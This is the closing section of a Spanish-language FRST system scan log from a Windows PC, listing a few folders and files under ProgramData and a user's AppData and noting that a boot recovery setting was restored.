2021-07-16 02:25 - 2020-11-25 21:09 - 000000000 ____D C:\ProgramData\Riot Games

==================== Archivos en la raíz de algunos directorios ========

2021-06-22 23:55 - 2021-08-01 23:53 - 000007602 _____ () C:\Users\Joseba\AppData\Local\Resmon.ResmonCfg
2020-05-30 13:34 - 2020-05-30 13:34 - 000000000 _____ () C:\Users\Joseba\AppData\Local\{7472C90D-3210-41C9-BA10-B27DDF6EF072}

==================== SigCheck ============================

(No existe una corrección automática para los archivos que no pasan la verificación.)


BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restaurado correctamente

LastRegBack: 2021-06-16 01:38
==================== Final de FRST.txt ========================